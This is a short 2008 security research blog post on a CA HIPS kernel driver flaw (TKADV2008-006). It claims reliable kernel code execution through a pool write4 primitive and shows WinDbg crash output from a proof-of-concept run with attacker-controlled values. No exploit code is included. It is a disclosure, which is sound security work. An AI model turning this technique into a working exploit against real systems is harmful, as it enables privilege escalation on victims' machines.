Tuesday, August 12, 2008

Reliable code execution with TKADV2008-006

The CA HIPS kernel driver vulnerability described in TKADV2008-006 can be exploited using the common kernel pool (heap) write4 primitive. It is therefore possible to get reliable code execution in kernel mode under all supported plattforms (Windows 2000, XP and 2003).

DRIVER_CORRUPTED_EXPOOL (c5)
An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is caused by drivers that have corrupted the system pool. Run the driver verifier against any new (or suspect) drivers, and if that doesn't turn up the culprit, then use gflags to enable special pool.

Arguments:
Arg1: 41414141, memory referenced
Arg2: 00000002, IRQL
Arg3: 00000001, value 0 = read operation, 1 = write operation
Arg4: 80543a03, address which referenced memory

[...]

FAULTING_IP:
nt!ExDeferredFreePool+fd
80543a03 8913 mov dword ptr [ebx],edx

DEFAULT_BUCKET_ID: DRIVER_FAULT

PROCESS_NAME: poc_xp.exe

TRAP_FRAME: f5c7faa0 -- (.trap 0xfffffffff5c7faa0)
ErrCode = 00000002
eax=0012df50 ebx=41414141 ecx=0012e050 edx=42424242 esi=81e44938 edi=000001ff eip=80543a03 esp=f5c7fb14 ebp=f5c7fb54 iopl=0 nv up ei ng nz ac pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010297
nt!ExDeferredFreePool+0xfd:
80543a03 8913 mov dword ptr [ebx],edx ds:0023:41414141=????????
Resetting default scope

LAST_CONTROL_TRANSFER: from 804f79d7 to 80526fc8

STACK_TEXT:
[...] 00000003 f5c7f9b0 00000000 nt!RtlpBreakWithStatusInstruction
[...] 00000003 41414141 80543a03 nt!KiBugCheckDebugBreak+0x19
[...] 0000000a 41414141 00000002 nt!KeBugCheck2+0x574
[...] 0000000a 41414141 00000002 nt!KiTrap0E+0x233
[...] 0012df58 00000000 0012ef70 nt!ExDeferredFreePool+0xfd
[...] 0012ef70 00000000 0012ef70 nt!ExFreePoolWithTag+0x489
[...] 0012ef70 81b81770 f6c87a01 nt!IoFreeMdl+0x6e
WARNING: Stack unwind information not available. Following frames may be wrong.
[...] 00000000 00000000 00000000 kmxfw+0x2b90